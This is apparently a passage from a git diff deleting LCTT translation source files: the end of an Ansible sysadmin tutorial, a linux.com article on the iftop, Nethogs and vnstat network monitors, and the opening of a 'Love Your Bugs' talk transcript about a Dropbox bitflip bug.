This would create **myuser** on **serverA** , **serverB** , and **serverC** ; however, it would run the **useradd** command every single time the for-loop was run, whether or not the user existed. An idempotent system will first check whether the user exists, and if it does not, the tool will create it. This is a simplified example, of course, but the benefits of an idempotent tool will become more clear over time.
|
||||
|
||||
#### How does Ansible work?
|
||||
|
||||
Ansible translates _Ansible playbooks_ into commands that are run over SSH, which has several benefits when it comes to managing Unix-like environments:
|
||||
|
||||
1. Most, if not all of the Unix-like machines you are administering will have SSH running by default.
|
||||
2. Relying on SSH means that no agent is required on the remote host.
|
||||
3. In most cases no additional software needs to be installed as Ansible requires Python 2.6 in order to operate. Most, if not all distributions of Linux have this version (or greater) installed by default.
|
||||
4. Ansible does not require a _master_ node. It can be run from any host that has the Ansible package installed and sufficient SSH access.
|
||||
5. Although running Ansible in a cron job is possible, by default Ansible only runs when you tell it to.
|
||||
|
||||
|
||||
|
||||
#### Setting up SSH key authentication
|
||||
|
||||
A common method for using Ansible is to set up passwordless SSH keys to facilitate ease of management. (Using Ansible Vault for passwords and other sensitive information is possible, but is outside the scope of this article.) For now, simply generate an SSH key with the following command as shown in Example 1.
|
||||
|
||||
##### Example 1: Generating An SSH Key
|
||||
```
|
||||
[09:44 user ~]$ ssh-keygen
|
||||
Generating public/private rsa key pair.
|
||||
Enter file in which to save the key (/home/user/.ssh/id_rsa):
|
||||
Created directory '/home/user/.ssh'.
|
||||
Enter passphrase (empty for no passphrase):
|
||||
Enter same passphrase again:
|
||||
Your identification has been saved in /home/user/.ssh/id_rsa.
|
||||
Your public key has been saved in /home/user/.ssh/id_rsa.pub.
|
||||
The key fingerprint is:
|
||||
SHA256:TpMyzf4qGqXmx3aqZijVv7vO9zGnVXsh6dPbXAZ+LUQ user@user-fedora
|
||||
The key's randomart image is:
|
||||
+---[RSA 2048]----+
|
||||
| |
|
||||
| |
|
||||
| E |
|
||||
| o . .. |
|
||||
| . + S o+. |
|
||||
| . .o * . .+ooo|
|
||||
| . .+o o o oo+.*|
|
||||
|. .ooo* o. * .*+|
|
||||
| . o+*BO.o+ .o|
|
||||
+----[SHA256]-----+
|
||||
```
|
||||
|
||||
In Example 1, the _Enter_ key is used to accept the defaults. An SSH key can be generated by any unprivileged user and installed in any user's SSH **authorized_keys** file on the remote system. After the key has been generated, it will need to be copied to a remote host. To do so, run the following command:
|
||||
```
|
||||
ssh-copy-id root@servera
|
||||
```
|
||||
|
||||
_Note: Ansible does not require root access; however, if you choose to use a non-root user, you_ must _configure the appropriate **sudo** permissions for the tasks you want to accomplish._
|
||||
|
||||
You will be prompted for the root password for **servera** , which will allow your SSH key to be installed on the remote host. After the initial installation of the SSH key, you will no longer be prompted for the root password on the remote host when logging in over SSH.
|
||||
|
||||
### Installing Ansible
|
||||
|
||||
The installation of the Ansible package is only required on the host that generated the SSH key in Example 1. If you are running Fedora, you can issue the following command:
|
||||
```
|
||||
sudo dnf install ansible -y
|
||||
```
|
||||
|
||||
If you run CentOS, you need to configure Extra Packages for Enterprise Linux (EPEL) repositories:
|
||||
```
|
||||
sudo yum install epel-release -y
|
||||
```
|
||||
|
||||
Then you can install Ansible with yum:
|
||||
```
|
||||
sudo yum install ansible -y
|
||||
```
|
||||
|
||||
For Ubuntu-based systems, you can install Ansible from the PPA:
|
||||
```
|
||||
sudo apt-get install software-properties-common -y
|
||||
sudo apt-add-repository ppa:ansible/ansible
|
||||
sudo apt-get update
|
||||
sudo apt-get install ansible -y
|
||||
```
|
||||
|
||||
If you are using macOS, the recommended installation is done via Python PIP:
|
||||
```
|
||||
sudo pip install ansible
|
||||
```
|
||||
|
||||
See the [Ansible installation documentation][2] for other distributions.
|
||||
|
||||
### Working with Ansible Inventory
|
||||
|
||||
Ansible uses an INI-style file called an _Inventory_ to track which servers it may manage. By default this file is located in **/etc/ansible/hosts**. In this article, I will use the Ansible Inventory shown in Example 2 to perform actions against the desired hosts (which has been pared down for brevity):
|
||||
|
||||
##### Example 2: Ansible hosts file
|
||||
```
|
||||
[arch]
|
||||
nextcloud
|
||||
prometheus
|
||||
desktop1
|
||||
desktop2
|
||||
vm-host15
|
||||
|
||||
[fedora]
|
||||
netflix
|
||||
|
||||
[centos]
|
||||
conan
|
||||
confluence
|
||||
7-repo
|
||||
vm-server1
|
||||
gitlab
|
||||
|
||||
[ubuntu]
|
||||
trusty-mirror
|
||||
nwn
|
||||
kids-tv
|
||||
media-centre
|
||||
nas
|
||||
|
||||
[satellite]
|
||||
satellite
|
||||
|
||||
[ocp]
|
||||
lb00
|
||||
ocp_dns
|
||||
master01
|
||||
app01
|
||||
infra01
|
||||
```
|
||||
|
||||
Each group, which is denoted via square brackets and a group name (such as **[group1]** ), is an arbitrary group name that can be applied to a set of servers. A server can exist in multiple groups without issue. In this case, I have groups for operating systems ( _arch_ , _ubuntu_ , _centos_ , _fedora_ ), as well as server function ( _ocp_ , _satellite_ ). The Ansible host file can handle significantly more advanced functionality than what I am using. For more information, see [the Inventory documentation][3].
|
||||
|
||||
### Running ad hoc commands
|
||||
|
||||
After you have copied your SSH keys to all the servers in your inventory, you are ready to start using Ansible. A basic Ansible function is the ability to run ad hoc commands. The syntax is:
|
||||
```
|
||||
ansible -a "some command"
|
||||
```
|
||||
|
||||
For example, if you want to update all of the CentOS servers, you might run:
|
||||
```
|
||||
ansible centos -a 'yum update -y'
|
||||
```
|
||||
|
||||
_Note: Having group names based on the operating system of the server is not necessary. As I will discuss,[Ansible Facts][4] can be used to gather this information; however, issuing ad hoc commands becomes more complex when trying to use Facts, and so for convenience I recommend creating a few groups based on operating system if you manage a heterogeneous environment._
|
||||
|
||||
This will loop over each of the servers in the group **centos** and install all of the updates. A more useful ad hoc command would be the Ansible **ping** module, which is used to verify that a server is ready to receive commands:
|
||||
```
|
||||
ansible all -m ping
|
||||
```
|
||||
|
||||
This will result in Ansible attempting to log in via SSH to all of the servers in your inventory. Truncated output for the **ping** command can be seen in Example 3.
|
||||
|
||||
##### Example 3: Ansible ping command output
|
||||
```
|
||||
nwn | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
media-centre | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
nas | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
kids-tv | SUCCESS => {
|
||||
"changed": false,
|
||||
"ping": "pong"
|
||||
}
|
||||
...
|
||||
```
|
||||
|
||||
The ability to run ad hoc commands is useful for quick tasks, but what if you want to be able to run the same tasks later, in a repeatable fashion? For that Ansible implements [playbooks][5].
|
||||
|
||||
### Ansible playbooks for complex tasks
|
||||
|
||||
An Ansible playbook is a YAML file that contains all the instructions that Ansible should complete during a run. For the purposes of this exercise, I will not get into more advanced topics such as Roles and Templates. If you are interested in learning more, [the documentation][6] is a great place to start.
|
||||
|
||||
In the previous section, I encouraged you to use the **ssh-copy-id** command to propagate your SSH keys; however, this article is focused on how to accomplish tasks in a consistent, repeatable manner. Example 4 demonstrates one method for ensuring, in an idempotent fashion, that an SSH key exists on the target hosts.
|
||||
|
||||
##### Example 4: Ansible playbook "push_ssh_keys.yaml"
|
||||
```
|
||||
---
|
||||
- hosts: all
|
||||
gather_facts: false
|
||||
vars:
|
||||
ssh_key: '/root/playbooks/files/laptop_ssh_key'
|
||||
tasks:
|
||||
- name: copy ssh key
|
||||
authorized_key:
|
||||
key: "{{ lookup('file', ssh_key) }}"
|
||||
user: root
|
||||
```
|
||||
|
||||
In the playbook from Example 4, all of the critical sections are highlighted.
|
||||
|
||||
The **\- hosts:** line indicates which host groups the playbook should evaluate. In this particular case, it is going to examine all of the hosts from our _Inventory_.
|
||||
|
||||
The **gather_facts:** line instructs Ansible to attempt to find out detailed information about each host. I will examine this in more detail later. For now, **gather_facts** is set to **false** to save time.
|
||||
|
||||
The **vars:** section, as one might imagine, is used to define variables that can be used throughout the playbook. In such a short playbook as the one in Example 4, it is more a convenience rather than a necessity.
|
||||
|
||||
Finally the main section is indicated by **tasks:**. This is where most of the instructions are located. Each task should have a **\- name:**. This is what is displayed as Ansible is carrying out a **run** , or playbook execution.
|
||||
|
||||
The **authorized_key:** heading is the name of the Ansible Module that the playbook is using. Information about Ansible Modules can be accessed on the command line via **ansible-doc -a** ; however it may be more convenient to view the [documentation][7] in a web browser. The [authorized_key module][8] has plenty of great examples to get started with. To run the playbook in Example 4, simply use the **ansible-playbook** command:
|
||||
```
|
||||
ansible-playbook push_ssh_keys.yaml
|
||||
```
|
||||
|
||||
If this is the first time adding an SSH key to the box, SSH will prompt you for a password for the root user.
|
||||
|
||||
Now that your servers have SSH keys propagated, it's time to do something a little more interesting.
|
||||
|
||||
### Ansible and gathering facts
|
||||
|
||||
Ansible has the ability to gather all kinds of facts about the target system. This can consume a significant amount of time if you have a large number of hosts. In my experience, it can take 1 to 2 seconds per host, and possibly longer; however, there are benefits to fact gathering. Consider the following playbook used for turning off the ability for users to log in with a password as the root user:
|
||||
|
||||
##### Example 5: Lock down root SSH account
|
||||
|
||||
```
|
||||
---
|
||||
- hosts: all
|
||||
gather_facts: true
|
||||
vars:
|
||||
tasks:
|
||||
- name: Enabling ssh-key only root access
|
||||
lineinfile:
|
||||
dest: /etc/ssh/sshd_config
|
||||
regexp: '^PermitRootLogin'
|
||||
line: 'PermitRootLogin without-password'
|
||||
notify:
|
||||
- restart_sshd
|
||||
- restart_ssh
|
||||
|
||||
handlers:
|
||||
- name: restart_sshd
|
||||
service:
|
||||
name: sshd
|
||||
state: restarted
|
||||
enabled: true
|
||||
when: ansible_distribution == 'RedHat'
|
||||
- name: restart_ssh
|
||||
service:
|
||||
name: ssh
|
||||
state: restarted
|
||||
enabled: true
|
||||
when: ansible_distribution == 'Debian'
|
||||
```
|
||||
|
||||
In Example 5 the **sshd_config** file is modified, with the [conditional][9] executing only if a distribution match is found. In this case Red Hat-based distributions name their SSH service differently than Debian-based ones, which is the purpose of the conditional statement. Although there are other ways to achieve this same effect, the example helps demonstrate Ansible facts. If you want to see all of the facts that Ansible gathers by default, you can run the **setup** module on your localhost:
|
||||
```
|
||||
ansible localhost -m setup |less
|
||||
|
||||
```
|
||||
|
||||
Any fact that is discovered by Ansible can be used to base decisions upon much the same way the **vars:** section that was shown in Example 4 is used. The difference is Ansible facts are considered to be **built in** variables, and thus do not have to be defined by the administrator.
|
||||
|
||||
### Next steps
|
||||
|
||||
Now you have the tools to start investigating Ansible and creating your own playbooks. Ansible is a tool that has so much depth, complexity, and flexibility that it would be impossible to cover everything in one article. This article should be enough to pique your interest and inspire you to explore the possibilities Ansible provides. In my next article, I will discuss the **Copy** , **systemd** , **service** , **apt** , **yum** , **virt** , and **user** modules. We can combine these to create update and installation playbooks, and to create a basic Git server to store all of the playbooks that may get created.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/7/automate-sysadmin-ansible
|
||||
|
||||
作者:[Steve Ovens][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/stratusss
|
||||
[1]:https://opensource.com/tags/ansible
|
||||
[2]:http://docs.ansible.com/ansible/intro_installation.html
|
||||
[3]:http://docs.ansible.com/ansible/intro_inventory.html
|
||||
[4]:http://docs.ansible.com/ansible/playbooks_variables.html#information-discovered-from-systems-facts
|
||||
[5]:http://docs.ansible.com/ansible/playbooks.html
|
||||
[6]:http://docs.ansible.com/ansible/playbooks_roles.html
|
||||
[7]:http://docs.ansible.com/ansible/modules_by_category.html
|
||||
[8]:http://docs.ansible.com/ansible/authorized_key_module.html
|
||||
[9]:http://docs.ansible.com/ansible/lineinfile_module.html
|
@ -1,190 +0,0 @@
|
||||
3 Simple, Excellent Linux Network Monitors
|
||||
============================================================
|
||||
KeyLD translating
|
||||
|
||||
![network](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner_3.png?itok=iuPcSN4k "network")
|
||||
Learn more about your network connections with the iftop, Nethogs, and vnstat tools.[Used with permission][3]
|
||||
|
||||
You can learn an amazing amount of information about your network connections with these three glorious Linux networking commands. iftop tracks network connections by process number, Nethogs quickly reveals what is hogging your bandwidth, and vnstat runs as a nice lightweight daemon to record your usage over time.
|
||||
|
||||
### iftop
|
||||
|
||||
The excellent [iftop][8] listens to the network interface that you specify, and displays connections in a top-style interface.
|
||||
|
||||
This is a great little tool for quickly identifying hogs, measuring speed, and also to maintain a running total of your network traffic. It is rather surprising to see how much bandwidth we use, especially for us old people who remember the days of telephone land lines, modems, screaming kilobits of speed, and real live bauds. We abandoned bauds a long time ago in favor of bit rates. Baud measures signal changes, which sometimes were the same as bit rates, but mostly not.
|
||||
|
||||
If you have just one network interface, run iftop with no options. iftop requires root permissions:
|
||||
|
||||
```
|
||||
$ sudo iftop
|
||||
```
|
||||
|
||||
When you have more than one, specify the interface you want to monitor:
|
||||
|
||||
```
|
||||
$ sudo iftop -i wlan0
|
||||
```
|
||||
|
||||
Just like top, you can change the display options while it is running.
|
||||
|
||||
* **h** toggles the help screen.
|
||||
|
||||
* **n** toggles name resolution.
|
||||
|
||||
* **s** toggles source host display, and **d** toggles the destination hosts.
|
||||
|
||||
* **S** toggles source port display, and **D** toggles destination port display.
|
||||
|
||||
* **N** toggles port resolution; to see all port numbers toggle resolution off.
|
||||
|
||||
* **t** toggles the text interface. The default display requires ncurses. I think the text display is more readable and better-organized (Figure 1).
|
||||
|
||||
* **p** pauses the display.
|
||||
|
||||
* **q** quits the program.
|
||||
|
||||
|
||||
![text display](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_8.png?itok=luKHS5ve "text display")
|
||||
Figure 1: The text display is readable and organized.[Used with permission][1]
|
||||
|
||||
When you toggle the display options, iftop continues to measure all traffic. You can also select a single host to monitor. You need the host's IP address and netmask. I was curious how much of a load Pandora put on my sad little meager bandwidth cap, so first I used dig to find their IP address:
|
||||
|
||||
```
|
||||
$ dig A pandora.com
|
||||
[...]
|
||||
;; ANSWER SECTION:
|
||||
pandora.com. 267 IN A 208.85.40.20
|
||||
pandora.com. 267 IN A 208.85.40.50
|
||||
```
|
||||
|
||||
What's the netmask? [ipcalc][9] tells us:
|
||||
|
||||
```
|
||||
$ ipcalc -b 208.85.40.20
|
||||
Address: 208.85.40.20
|
||||
Netmask: 255.255.255.0 = 24
|
||||
Wildcard: 0.0.0.255
|
||||
=>
|
||||
Network: 208.85.40.0/24
|
||||
```
|
||||
|
||||
Now feed the address and netmask to iftop:
|
||||
|
||||
```
|
||||
$ sudo iftop -F 208.85.40.20/24 -i wlan0
|
||||
```
|
||||
|
||||
Is that not seriously groovy? I was surprised to learn that Pandora is easy on my precious bits, using around 500Kb per hour. And, like most streaming services, Pandora's traffic comes in spurts and relies on caching to smooth out the lumps and bumps.
|
||||
|
||||
You can do the same with IPv6 addresses, using the **-G** option. Consult the fine man page to learn the rest of iftop's features, including customizing your default options with a personal configuration file, and applying custom filters (see [PCAP-FILTER][10] for a filter reference).
|
||||
|
||||
### Nethogs
|
||||
|
||||
When you want to quickly learn who is sucking up your bandwidth, Nethogs is fast and easy. Run it as root and specify the interface to listen on. It displays the hoggy application and the process number, so that you may kill it if you so desire:
|
||||
|
||||
```
|
||||
$ sudo nethogs wlan0
|
||||
|
||||
NetHogs version 0.8.1
|
||||
|
||||
PID USER PROGRAM DEV SENT RECEIVED
|
||||
7690 carla /usr/lib/firefox wlan0 12.494 556.580 KB/sec
|
||||
5648 carla .../chromium-browser wlan0 0.052 0.038 KB/sec
|
||||
TOTAL 12.546 556.618 KB/sec
|
||||
```
|
||||
|
||||
Nethogs has few options: cycling between kb/s, kb, b, and mb, sorting by received or sent packets, and adjusting the delay between refreshes. See `man nethogs`, or run `nethogs -h`.
|
||||
|
||||
### vnstat
|
||||
|
||||
[vnstat][11] is the easiest network data collector to use. It is lightweight and does not need root permissions. It runs as a daemon and records your network statistics over time. The `vnstat` command displays the accumulated data:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0
|
||||
Database updated: Tue Oct 17 08:36:38 2017
|
||||
|
||||
wlan0 since 10/17/2017
|
||||
|
||||
rx: 45.27 MiB tx: 3.77 MiB total: 49.04 MiB
|
||||
|
||||
monthly
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
Oct '17 45.27 MiB | 3.77 MiB | 49.04 MiB | 0.28 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 85 MiB | 5 MiB | 90 MiB |
|
||||
|
||||
daily
|
||||
rx | tx | total | avg. rate
|
||||
------------------------+-------------+-------------+---------------
|
||||
today 45.27 MiB | 3.77 MiB | 49.04 MiB | 12.96 kbit/s
|
||||
------------------------+-------------+-------------+---------------
|
||||
estimated 125 MiB | 8 MiB | 133 MiB |
|
||||
```
|
||||
|
||||
By default it displays all network interfaces. Use the `-i` option to select a single interface. Merge the data of multiple interfaces this way:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan0+eth0+eth1
|
||||
```
|
||||
|
||||
You can filter the display in several ways:
|
||||
|
||||
* **-h** displays statistics by hours.
|
||||
|
||||
* **-d** displays statistics by days.
|
||||
|
||||
* **-w** and **-m** displays statistics by weeks and months.
|
||||
|
||||
* Watch live updates with the **-l** option.
|
||||
|
||||
This command deletes the database for wlan1 and stops watching it:
|
||||
|
||||
```
|
||||
$ vnstat -i wlan1 --delete
|
||||
```
|
||||
|
||||
This command creates an alias for a network interface. This example uses one of the weird interface names from Ubuntu 16.04:
|
||||
|
||||
```
|
||||
$ vnstat -u -i enp0s25 --nick eth0
|
||||
```
|
||||
|
||||
By default vnstat monitors eth0\. You can change this in `/etc/vnstat.conf`, or create your own personal configuration file in your home directory. See `man vnstat` for a complete reference.
|
||||
|
||||
You can also install vnstati to create simple, colored graphs (Figure 2):
|
||||
|
||||
```
|
||||
$ vnstati -s -i wlx7cdd90a0a1c2 -o vnstat.png
|
||||
```
|
||||
|
||||
|
||||
![vnstati](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_5.png?itok=HsWJMcW0 "vnstati")
|
||||
Figure 2: You can create simple colored graphs with vnstati.[Used with permission][2]
|
||||
|
||||
See `man vnstati` for complete options.
|
||||
|
||||
_Learn more about Linux through the free ["Introduction to Linux" ][7]course from The Linux Foundation and edX._
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/10/3-simple-excellent-linux-network-monitors
|
||||
|
||||
作者:[CARLA SCHRODER ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/cschroder
|
||||
[1]:https://www.linux.com/licenses/category/used-permission
|
||||
[2]:https://www.linux.com/licenses/category/used-permission
|
||||
[3]:https://www.linux.com/licenses/category/used-permission
|
||||
[4]:https://www.linux.com/files/images/fig-1png-8
|
||||
[5]:https://www.linux.com/files/images/fig-2png-5
|
||||
[6]:https://www.linux.com/files/images/bannerpng-3
|
||||
[7]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
[8]:http://www.ex-parrot.com/pdw/iftop/
|
||||
[9]:https://www.linux.com/learn/intro-to-linux/2017/8/how-calculate-network-addresses-ipcalc
|
||||
[10]:http://www.tcpdump.org/manpages/pcap-filter.7.html
|
||||
[11]:http://humdi.net/vnstat/
|
@ -1,313 +0,0 @@
|
||||
yixunx translating
|
||||
|
||||
Love Your Bugs
|
||||
============================================================
|
||||
|
||||
In early October I gave a keynote at [Python Brasil][1] in Belo Horizonte. Here is an aspirational and lightly edited transcript of the talk. There is also a video available [here][2].
|
||||
|
||||
### I love bugs
|
||||
|
||||
I’m currently a senior engineer at [Pilot.com][3], working on automating bookkeeping for startups. Before that, I worked for [Dropbox][4] on the desktop client team, and I’ll have a few stories about my work there. Earlier, I was a facilitator at the [Recurse Center][5], a writers retreat for programmers in NYC. I studied astrophysics in college and worked in finance for a few years before becoming an engineer.
|
||||
|
||||
But none of that is really important to remember – the only thing you need to know about me is that I love bugs. I love bugs because they’re entertaining. They’re dramatic. The investigation of a great bug can be full of twists and turns. A great bug is like a good joke or a riddle – you’re expecting one outcome, but the result veers off in another direction.
|
||||
|
||||
Over the course of this talk I’m going to tell you about some bugs that I have loved, explain why I love bugs so much, and then convince you that you should love bugs too.
|
||||
|
||||
### Bug #1
|
||||
|
||||
Ok, straight into bug #1\. This is a bug that I encountered while working at Dropbox. As you may know, Dropbox is a utility that syncs your files from one computer to the cloud and to your other computers.
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | |
|
||||
| | +----------+ |
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
Here’s a vastly simplified diagram of Dropbox’s architecture. The desktop client runs on your local computer listening for changes in the file system. When it notices a changed file, it reads the file, then hashes the contents in 4MB blocks. These blocks are stored in the backend in a giant key-value store that we call blockserver. The key is the digest of the hashed contents, and the values are the contents themselves.
|
||||
|
||||
Of course, we want to avoid uploading the same block multiple times. You can imagine that if you’re writing a document, you’re probably mostly changing the end – we don’t want to upload the beginning over and over. So before uploading a block to the blockserver the client talks to a different server that’s responsible for managing metadata and permissions, among other things. The client asks metaserver whether it needs the block or has seen it before. The “metaserver” responds with whether or not each block needs to be uploaded.
|
||||
|
||||
So the request and response look roughly like this: The client says, “I have a changed file made up of blocks with hashes `'abcd,deef,efgh'`”. The server responds, “I have those first two, but upload the third.” Then the client sends the block up to the blockserver.
|
||||
|
||||
|
||||
```
|
||||
+--------------+ +---------------+
|
||||
| | | |
|
||||
| METASERVER | | BLOCKSERVER |
|
||||
| | | |
|
||||
+-+--+---------+ +---------+-----+
|
||||
^ | ^
|
||||
| | 'ok, ok, need' |
|
||||
'abcd,deef,efgh' | | +----------+ | efgh: [contents]
|
||||
| +---> | | |
|
||||
| | CLIENT +--------+
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
|
||||
|
||||
That’s the setup. So here’s the bug.
|
||||
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
| METASERVER |
|
||||
| |
|
||||
+-+--+---------+
|
||||
^ |
|
||||
| | '???'
|
||||
'abcdldeef,efgh' | | +----------+
|
||||
^ | +---> | |
|
||||
^ | | CLIENT +
|
||||
+--------+ |
|
||||
+----------+
|
||||
```
|
||||
|
||||
Sometimes the client would make a weird request: each hash value should have been sixteen characters long, but instead it was thirty-three characters long – twice as many plus one. The server wouldn’t know what to do with this and would throw an exception. We’d see this exception get reported, and we’d go look at the log files from the desktop client, and really weird stuff would be going on – the client’s local database had gotten corrupted, or python would be throwing MemoryErrors, and none of it would make sense.
|
||||
|
||||
If you’ve never seen this problem before, it’s totally mystifying. But once you’d seen it once, you can recognize it every time thereafter. Here’s a hint: the middle character of each 33-character string that we’d often see instead of a comma was `l`. These are the other characters we’d see in the middle position:
|
||||
|
||||
|
||||
```
|
||||
l \x0c < $ ( . -
|
||||
```
|
||||
|
||||
The ordinal value for an ascii comma – `,` – is 44\. The ordinal value for `l` is 108\. In binary, here’s how those two are represented:
|
||||
|
||||
```
|
||||
bin(ord(',')): 0101100
|
||||
bin(ord('l')): 1101100
|
||||
```
|
||||
|
||||
You’ll notice that an `l` is exactly one bit away from a comma. And herein lies your problem: a bitflip. One bit of memory that the desktop client is using has gotten corrupted, and now the desktop client is sending a request to the server that is garbage.
|
||||
|
||||
And here are the other characters we’d frequently see instead of the comma when a different bit had been flipped.
|
||||
|
||||
|
||||
|
||||
```
|
||||
, : 0101100
|
||||
l : 1101100
|
||||
\x0c : 0001100
|
||||
< : 0111100
|
||||
$ : 0100100
|
||||
( : 0101000
|
||||
. : 0101110
|
||||
- : 0101101
|
||||
```
|
||||
|
||||
|
||||
### Bitflips are real!
|
||||
|
||||
I love this bug because it shows that bitflips are a real thing that can happen, not just a theoretical concern. In fact, there are some domains where they’re more common than others. One such domain is if you’re getting requests from users with low-end or old hardware, which is true for a lot of laptops running Dropbox. Another domain with lots of bitflips is outer space – there’s no atmosphere in space to protect your memory from energetic particles and radiation, so bitflips are pretty common.
|
||||
|
||||
You probably really care about correctness in space – your code might be keeping astronauts alive on the ISS, for example, but even if it’s not mission-critical, it’s hard to do software updates to space. If you really need your application to defend against bitflips, there are a variety of hardware & software approaches you can take, and there’s a [very interesting talk][6] by Katie Betchold about this.
|
||||
|
||||
Dropbox in this context doesn’t really need to protect against bitflips. The machine that is corrupting memory is a user’s machine, so we can detect if the bitflip happens to fall in the comma – but if it’s in a different character we don’t necessarily know it, and if the bitflip is in the actual file data read off of disk, then we have no idea. There’s a pretty limited set of places where we could address this, and instead we decide to basically silence the exception and move on. Often this kind of bug resolves after the client restarts.
|
||||
|
||||
### Unlikely bugs aren’t impossible
|
||||
|
||||
This is one of my favorite bugs for a couple of reasons. The first is that it’s a reminder of the difference between unlikely and impossible. At sufficient scale, unlikely events start to happen at a noticeable rate.
|
||||
|
||||
### Social bugs
|
||||
|
||||
My second favorite thing about this bug is that it’s a tremendously social one. This bug can crop up anywhere that the desktop client talks to the server, which is a lot of different endpoints and components in the system. This meant that a lot of different engineers at Dropbox would see versions of the bug. The first time you see it, you can _really_ scratch your head, but after that it’s easy to diagnose, and the investigation is really quick: you look at the middle character and see if it’s an `l`.
|
||||
|
||||
### Cultural differences
|
||||
|
||||
One interesting side-effect of this bug was that it exposed a cultural difference between the server and client teams. Occasionally this bug would be spotted by a member of the server team and investigated from there. If one of your _servers_ is flipping bits, that’s probably not random chance – it’s probably memory corruption, and you need to find the affected machine and get it out of the pool as fast as possible or you risk corrupting a lot of user data. That’s an incident, and you need to respond quickly. But if the user’s machine is corrupting data, there’s not a lot you can do.
|
||||
|
||||
### Share your bugs
|
||||
|
||||
So if you’re investigating a confusing bug, especially one in a big system, don’t forget to talk to people about it. Maybe your colleagues have seen a bug shaped like this one before. If they have, you might save a lot of time. And if they haven’t, don’t forget to tell people about the solution once you’ve figured it out – write it up or tell the story in your team meeting. Then the next time your teams hits something similar, you’ll all be more prepared.
|
||||
|
||||
### How bugs can help you learn
|
||||
|
||||
### Recurse Center
|
||||
|
||||
Before I joined Dropbox, I worked for the Recurse Center. The idea behind RC is that it’s a community of self-directed learners spending time together getting better as programmers. That is the full extent of the structure of RC: there’s no curriculum or assignments or deadlines. The only scoping is a shared goal of getting better as a programmer. We’d see people come to participate in the program who had gotten CS degrees but didn’t feel like they had a solid handle on practical programming, or people who had been writing Java for ten years and wanted to learn Clojure or Haskell, and many other profiles as well.
|
||||
|
||||
My job there was as a facilitator, helping people make the most of the lack of structure and providing guidance based on what we’d learned from earlier participants. So my colleagues and I were very interested in the best techniques for learning for self-motivated adults.
|
||||
|
||||
### Deliberate Practice
|
||||
|
||||
There’s a lot of different research in this space, and one of the ones I think is most interesting is the idea of deliberate practice. Deliberate practice is an attempt to explain the difference in performance between experts & amateurs. And the guiding principle here is that if you look just at innate characteristics – genetic or otherwise – they don’t go very far towards explaining the difference in performance. So the researchers, originally Ericsson, Krampe, and Tesch-Romer, set out to discover what did explain the difference. And what they settled on was time spent in deliberate practice.
|
||||
|
||||
Deliberate practice is pretty narrow in their definition: it’s not work for pay, and it’s not playing for fun. You have to be operating on the edge of your ability, doing a project appropriate for your skill level (not so easy that you don’t learn anything and not so hard that you don’t make any progress). You also have to get immediate feedback on whether or not you’ve done the thing correctly.
|
||||
|
||||
This is really exciting, because it’s a framework for how to build expertise. But the challenge is that as programmers this is really hard advice to apply. It’s hard to know whether you’re operating at the edge of your ability. Immediate corrective feedback is very rare – in some cases you’re lucky to get feedback ever, and in other cases maybe it takes months. You can get quick feedback on small things in the REPL and so on, but if you’re making a design decision or picking a technology, you’re not going to get feedback on those things for quite a long time.
|
||||
|
||||
But one category of programming where deliberate practice is a useful model is debugging. If you wrote code, then you had a mental model of how it worked when you wrote it. But your code has a bug, so your mental model isn’t quite right. By definition you’re on the boundary of your understanding – so, great! You’re about to learn something new. And if you can reproduce the bug, that’s a rare case where you can get immediate feedback on whether or not your fix is correct.
|
||||
|
||||
A bug like this might teach you something small about your program, or you might learn something larger about the system your code is running in. Now I’ve got a story for you about a bug like that.
|
||||
|
||||
### Bug #2
|
||||
|
||||
This bug is also one that I encountered at Dropbox. At the time, I was investigating why some desktop clients weren’t sending logs as consistently as we expected. I’d started digging into the client logging system and discovered a bunch of interesting bugs. I’ll tell you only the subset of those bugs that is relevant to this story.
|
||||
|
||||
Again here’s a very simplified architecture of the system.
|
||||
|
||||
|
||||
```
|
||||
+--------------+
|
||||
| |
|
||||
+---+ +----------> | LOG SERVER |
|
||||
|log| | | |
|
||||
+---+ | +------+-------+
|
||||
| |
|
||||
+-----+----+ | 200 ok
|
||||
| | |
|
||||
| CLIENT | <-----------+
|
||||
| |
|
||||
+-----+----+
|
||||
^
|
||||
+--------+--------+--------+
|
||||
| ^ ^ |
|
||||
+--+--+ +--+--+ +--+--+ +--+--+
|
||||
| log | | log | | log | | log |
|
||||
| | | | | | | |
|
||||
| | | | | | | |
|
||||
+-----+ +-----+ +-----+ +-----+
|
||||
```
|
||||
|
||||
